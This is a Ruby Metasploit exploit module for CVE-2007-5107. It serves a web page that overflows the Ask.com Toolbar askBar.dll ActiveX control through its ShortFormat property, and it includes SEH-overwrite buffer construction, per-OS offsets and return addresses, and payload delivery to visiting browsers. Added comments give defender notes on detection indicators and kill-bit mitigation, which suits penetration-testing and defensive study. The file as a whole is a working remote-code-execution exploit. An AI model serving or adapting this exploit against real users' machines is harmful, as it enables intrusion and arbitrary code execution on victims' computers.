##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit server for the Ask.com Toolbar askBar.dll ActiveX control
# (CVE-2007-5107). The served page instantiates the control by CLSID and
# assigns an oversized string to its ShortFormat property; the string carries
# an SEH overwrite built by the Seh mixin from the selected target's offset
# and return address.
#
# Defender notes: the stable artifacts of this page are the CLSID
# 5A074B2B-F830-49DE-A31B-5BB9D7F6B407 in an <object> tag and a
# `.ShortFormat =` assignment of a very long string; the element id and the
# JavaScript variable name are regenerated per request and are not useful
# as indicators. Kill-bitting the CLSID or removing the toolbar mitigates it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # HTML-serving HTTP server (send_response_html, rand_text_alpha, handler)
  include Msf::Exploit::Remote::HttpServer::HTML
  # Provides generate_seh_payload used in on_request_uri
  include Msf::Exploit::Remote::Seh

  # Registers module metadata with the framework.
  #
  # @param info [Hash] additional info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.
An attacker may be able to execute arbitrary code by sending an overly
long string to the "ShortFormat()" method in askbar.dll.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'MC' ],
      'References' =>
        [
          [ 'CVE', '2007-5107' ],
          [ 'OSVDB', '37735' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 800,
          # The payload is embedded inside a single-quoted JavaScript string
          # literal (see on_request_uri), so NUL, tab, CR, LF, the single quote
          # and backslash would all terminate or alter that literal.
          'BadChars' => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      # 'Offset' is the number of filler bytes before the SEH record; 'Ret'
      # is the address written over the handler pointer. Both are specific
      # to the named OS/language build, so the target must match the client.
      'Targets' =>
        [
          [ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 2876, 'Ret' => 0x71aa32ad } ],
          [ 'Windows 2000 Pro English ALL', { 'Offset' => 1716, 'Ret' => 0x75022ac4 } ],
        ],
      'DisclosureDate' => '2007-09-24',
      'DefaultTarget' => 0))
  end

  # Returns false so the module is excluded from automatic exploit
  # selection (presumably the browser autopwn / db_autopwn filters —
  # confirm against the framework's autofilter contract).
  def autofilter
    false
  end

  # Declares that zlib must be available; use_zlib comes from the HTTP
  # server mixin and is expected to raise when it is not.
  def check_dependencies
    use_zlib
  end

  # Handles one HTTP request from a browser client: rebuilds the payload for
  # that client, assembles the overflow string, and serves the HTML page
  # that triggers it.
  #
  # @param cli [Object] the connected client (framework client object)
  # @param request [Object] the parsed HTTP request (unused here)
  # @return [nil] when the payload cannot be regenerated; otherwise the
  #   result of handler(cli)
  def on_request_uri(cli, request)
    # Re-generate the payload
    # Bail out silently if regeneration fails. NOTE(review): the assigned
    # `p` is not referenced afterwards; only the nil check matters.
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    # Random alphabetic identifiers of 1..100 characters (rand(100) is 0..99)
    # for the <object> id and the JavaScript variable, so each served page
    # differs textually.
    vname = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    # filler reaches the SEH record for the selected target; seh is the
    # Seh-mixin record built around target.ret (presumably it also carries
    # the encoded payload — verify in Msf::Exploit::Remote::Seh). The
    # trailing block is random padding sized to the encoded payload length.
    filler = rand_text_alpha(target['Offset'])
    seh = generate_seh_payload(target.ret)
    sploit = filler + seh + rand_text_alpha(payload.encoded.length)

    # Build out the message
    # The overflow string is interpolated into a single-quoted JS literal,
    # which is why ' and \ are among the payload BadChars.
    content = %Q|<html>
<object classid='clsid:5A074B2B-F830-49DE-A31B-5BB9D7F6B407' id='#{vname}'></object>
<script language='javascript'>
#{strname} = new String('#{sploit}');
#{vname}.ShortFormat = #{strname}
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end